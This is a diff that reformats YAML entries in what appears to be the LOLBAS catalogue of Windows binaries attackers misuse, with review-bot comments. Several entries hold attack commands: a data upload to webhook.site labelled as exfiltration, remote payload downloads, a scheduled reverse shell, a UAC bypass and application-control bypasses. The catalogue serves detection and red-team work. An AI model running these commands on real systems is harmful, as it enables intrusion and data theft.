Merge branch 'master' into feat/yamllinting
This commit is contained in:
commit
9f9af1cfee
@ -14,4 +14,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/986984122563391488
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
@ -22,4 +22,6 @@ Resources:
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||
- https://attack.mitre.org/wiki/Technique/T1128
|
||||
- https://twitter.com/teemuluotio/status/990532938952527873
|
||||
Notes: ''
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
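Review bot: The Acknowledgement block added at the bottom of this hunk is shaped as two separate list items (`- Person: ''` then `- Handle: ''`), whereas every other entry in this commit nests the handle under the person (compare `- Person: Jimmy` followed by an indented `Handle: '@bohops'` in the hunk above), so a loader reading `Acknowledgement[0].Handle` gets nothing here. The two lines should be `- Person: ''` followed by `Handle: ''` indented beneath it. Both values are also empty although the Resources list credits a tweet by @teemuluotio; if that is the original source, filling the fields in would be better than a blank placeholder. The `T1128` link uses the legacy wiki URL form seen elsewhere on this page and I believe that ID has since been retired upstream, so it is worth confirming it still resolves. The file name of this section is not visible in this view.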
|
@ -2,8 +2,7 @@
|
||||
Name: Nltest.exe
|
||||
Description: Credentials
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||
Description: ''
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/sysopfb/status/986799053668139009
|
||||
- https://ss64.com/nt/nltest.html
|
||||
Notes: Thanks to Sysopfb - @sysopfb
|
||||
Acknowledgement:
|
||||
- Person: Sysopfb
|
||||
Handle: '@sysopfb'
|
||||
|
@ -3,7 +3,6 @@ Name: Openwith.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: OpenWith.exe /c C:\test.hta
|
||||
Description: Opens the target file with the default application.
|
||||
@ -16,4 +15,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/harr0ey/status/991670870384021504
|
||||
Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
Acknowledgement:
|
||||
- Person: Matt harr0ey
|
||||
Handle: '@harr0ey'
|
@ -3,7 +3,6 @@ Name: Powershell.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||
@ -14,4 +13,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
Notes: Thanks to Moriarty - @Moriarty_Meng
|
||||
Acknowledgement:
|
||||
- Person: Moriarty
|
||||
Handle: '@Moriarty_Meng'
|
@ -18,4 +18,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||
Notes: 'Thanks to '
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
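Review bot: `Notes: 'Thanks to '` on the new side is an unfinished template string, and the Acknowledgement beneath it is again two single-key list items (`- Person: ''`, `- Handle: ''`) with empty values rather than one Person/Handle mapping. Since nothing in the hunk identifies who the credit was meant for, the honest fix is `Notes: ''` plus `- Person: ''` with `Handle: ''` indented under it, so the entry at least matches the schema used by the filled-in entries above. The only resource listed is a SANS summit PDF, which does not name a contributor either, so I cannot propose a value. The file name of this section is not visible in this view.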
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Robocopy.exe
|
||||
Description: Copy
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||
@ -16,4 +16,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||
Notes: Thanks to Name of guy - @twitterhandle
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
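Review bot: `Notes: Thanks to Name of guy - @twitterhandle` at the end of this hunk is the untouched template placeholder rather than a real credit, and it survives the reformat unchanged while the new Acknowledgement block below it (`- Person: ''`, `- Handle: ''`) is two list items instead of one Person/Handle mapping. I would replace the note with `Notes: ''` and write the acknowledgement as `- Person: ''` followed by an indented `Handle: ''`, consistent with the Nltest and Openwith entries in this commit. If the placeholder was meant to be filled in, the Resources link is a TechNet wiki article and does not identify a person, so the value has to come from the entry's author.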
|
@ -2,8 +2,7 @@
|
||||
Name: AcroRd32.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997997818362155008
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Gpup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997892519827558400
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nlnotes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
Acknowledgement:
|
||||
- Person: Daniel Bohannon
|
||||
Handle: '@danielhbohannon'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Notes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
Acknowledgement:
|
||||
- Person: Daniel Bohannon
|
||||
Handle: '@danielhbohannon'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nvudisp.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Nvudisp.exe System calc.exe
|
||||
Description: Execute calc.exe as a subprocess.
|
||||
@ -23,4 +22,7 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nvuhda6.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: nvuhda6.exe System calc.exe
|
||||
Description: Execute calc.exe as a subprocess.
|
||||
@ -23,4 +22,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||
Notes: Thanks to Adam - @hexacorn
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: ROCCAT_Swarm.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994213164484001793
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Setup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Run Setup.exe
|
||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994381620588236800
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Usbinst.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993514357807108096
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: VBoxDrvInst.exe
|
||||
Description: Persistence
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993497996179492864
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -1,7 +1,7 @@
|
||||
Name: aswrundll.exe
|
||||
Description: This process is used by AVAST antivirus to run and execute any modules
|
||||
Author: Eli Salem
|
||||
Created: 19\03\2019
|
||||
Created: '2019-03-19'
|
||||
Commands:
|
||||
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
|
||||
Description: Load and execute modules using aswrundll
|
||||
@ -17,4 +17,4 @@ Resources:
|
||||
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
handle: https://www.linkedin.com/in/eli-salem-954728150
|
||||
handle: 'https://www.linkedin.com/in/eli-salem-954728150'
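Review bot: The Acknowledgement key on the last line of this hunk is `handle:` in lower case, and the commit only adds quotes around its value, so this entry still disagrees with the `Handle:` key used by every other file on this page (for example `Handle: '@bohops'`); anything that reads `Handle` case-sensitively will miss this contributor's handle. The line should become `Handle: 'https://www.linkedin.com/in/eli-salem-954728150'`. Separately, the new `Created: '2019-03-19'` in the first hunk keeps the quotes that the rest of this commit removes (`Created: 2018-05-25` elsewhere), so `Created: 2019-03-19` would be consistent. Lines 9-16 of the file lie between the two hunks and are not shown.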
|
@ -2,7 +2,7 @@
|
||||
Name: winword.exe
|
||||
Description: Document editor included with Microsoft Office.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: winword.exe /l dllfile.dll
|
||||
Description: Launch DLL payload.
|
||||
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||
|
@ -2,18 +2,18 @@
|
||||
Name: testxlst.js
|
||||
Description: Script included with Pywin32.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
Categories: Execution
|
||||
Category: Execution
|
||||
Privileges: User
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
OperatingSystem: Windows
|
||||
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
Categories: Execution
|
||||
Category: Execution
|
||||
Privileges: User
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
@ -25,4 +25,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/993314069116485632
|
||||
- https://github.com/mhammond/pywin32
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
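Review bot: Both commands in this file still carry `MitreID: T1064` with the legacy `/wiki/Technique/` link; as far as I recall T1064 has been deprecated upstream in favour of the T1059 scripting sub-techniques, so while this commit is touching the `Category` keys it is worth verifying the ID resolves and switching the link to the `https://attack.mitre.org/techniques/...` form used by the new Aspnet_Compiler entry. The `Categories:` to `Category:` rename itself is correct and matches the other files. The lines between the two hunks of this file are not shown.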
|
||||
|
28
yml/OSBinaries/Aspnet_Compiler.yml
Normal file
28
yml/OSBinaries/Aspnet_Compiler.yml
Normal file
@ -0,0 +1,28 @@
|
||||
---
|
||||
Name: Aspnet_Compiler.exe
|
||||
Description: ASP.NET Compilation Tool
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
|
||||
Description: Execute C# code with the Build Provider and proper folder structure in place.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
||||
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
||||
Code_Sample:
|
||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
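Review bot: The single Detection entry, `- IOC: Sysmon Event ID 1 - Process Creation`, names a telemetry source rather than an indicator, so it gives a defender nothing to match on; every process on the host produces that event. The command in this file shows what is distinctive: aspnet_compiler.exe run with `-p`/`-f` pointing at a path under a user profile (`C:\users\...\desktop\asptest\`) rather than an IIS web application root. I would make that the IOC, e.g. `- IOC: aspnet_compiler.exe invoked with -p/-f paths under a user profile or other user-writable directory instead of a web application root`, and keep the Sysmon line only as the suggested data source. The file also closes with a second `---` after the Acknowledgement block; that is fine for a multi-document loader, but a single-document loader such as `yaml.safe_load` rejects a stream with two documents, so it is worth checking which loader the project's tooling uses.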
|
@ -2,7 +2,7 @@
|
||||
Name: At.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-09-20'
|
||||
Created: 2019-09-20
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
||||
Description: Create a recurring task to execute every day at a specific time.
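Review bot: The command on the new side, `C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe`, repeats the program name as its first argument: the full path already invokes at.exe, so the second `at` is handed to it as a parameter and the line does not run as shown. It should read `at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe` (or keep the full path and drop the bare `at`). This hunk only touches the `Created` line, so the rest of the entry, including any Detection block, is outside the view.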
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Atbroker.exe
|
||||
Description: Helper binary for Assistive Technology (AT)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ATBroker.exe /start malware
|
||||
Description: Start a registered Assistive Technology (AT).
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bash.exe
|
||||
Description: File used by Windows subsystem for Linux
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bash.exe -c calc.exe
|
||||
Description: Executes calc.exe from bash.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bitsadmin.exe
|
||||
Description: Used for managing background intelligent transfer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
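Review bot: The Command line in this hunk runs five separate bitsadmin invocations together as one string (`bitsadmin /create 1 bitsadmin /addfile 1 ...`) with no separators, so a reader who pastes it gets a single `bitsadmin /create` call with the remaining words as stray arguments, while the Description below it correctly describes five steps. Joining them with `&&` makes the line executable as documented: `bitsadmin /create 1 && bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe && bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL && bitsadmin /RESUME 1 && bitsadmin /complete 1`. The hunk only changes `Created`, so the rest of the entry is not visible here.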
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: CertReq.exe
|
||||
Description: Used for requesting and managing certificates
|
||||
Author: 'David Middlehurst'
|
||||
Created: '2020-07-07'
|
||||
Created: 2020-07-07
|
||||
Commands:
|
||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Certutil.exe
|
||||
Description: Windows binary used for handeling certificates
|
||||
Description: Windows binary used for handling certificates
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||
Description: Download and save 7zip to disk in the current folder.
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Cmd.exe
|
||||
Description: The command-line interpreter in Windows
|
||||
Author: 'Ye Yint Min Thu Htut'
|
||||
Created: '2019-06-26'
|
||||
Created: 2019-06-26
|
||||
Commands:
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
Description: Add content to an Alternate Data Stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: ADS
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cmdkey.exe
|
||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmdkey /list
|
||||
Description: List cached credentials
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cmstp.exe
|
||||
Description: Installs or removes a Connection Manager service profile.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: ConfigSecurityPolicy.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||
Author: 'Ialle Teixeira'
|
||||
Created: '04/09/2020'
|
||||
Created: 2020-09-04
|
||||
Commands:
|
||||
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||
Description: Upload file, credentials or data exfiltration in general
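Review bot: The command in this hunk writes the path with doubled separators, `ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe ...`; in an unquoted YAML plain scalar a backslash is literal, so the rendered entry shows `\\` while the neighbouring Control.exe and Cscript entries on this page use single backslashes, and `C:\Windows\System32\calc.exe` would match them. The Description line also carries a paragraph about 'pilot collections' and 'co-management workloads' that describes a Configuration Manager feature rather than this binary; trimming it to the first two sentences would leave only what the entry supports. The date conversion `'04/09/2020'` to `2020-09-04` follows the day/month reading the rest of this commit applies (28/06/2020 to 2020-06-28), which looks right. The rest of the entry is outside the hunk.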
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Control.exe
|
||||
Description: Binary used to launch controlpanel items in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Csc.exe
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: csc.exe -out:My.exe File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cscript.exe
|
||||
Description: Binary used to execute scripts in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript c:\ads\file.txt:script.vbs
|
||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Desktopimgdownldr.exe
|
||||
Description: Windows binary used to configure lockscreen/desktop image
|
||||
Author: Gal Kristal
|
||||
Created: 28/06/2020
|
||||
Created: 2020-06-28
|
||||
Commands:
|
||||
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||
Description: Downloads the file and sets it as the computer's lockscreen
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Dfsvc.exe
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Diantz.exe
|
||||
Description: Binary that package existing files into a cabinet (.cab) file
|
||||
Author: 'Tamir Yehuda'
|
||||
Created: '08/08/2020'
|
||||
Created: 2020-08-08
|
||||
Commands:
|
||||
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Diskshadow.exe
|
||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Dnscmd.exe
|
||||
Description: A command-line interface for managing DNS servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Esentutl.exe
|
||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||
Description: Copies the source VBS file to the destination VBS file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Eventvwr.exe
|
||||
Description: Displays Windows Event Logs in a GUI window.
|
||||
Author: 'Jacob Gajek'
|
||||
Created: '2018-11-01'
|
||||
Created: 2018-11-01
|
||||
Commands:
|
||||
- Command: eventvwr.exe
|
||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\eventvwr.exe
|
||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||
Detection:
|
||||
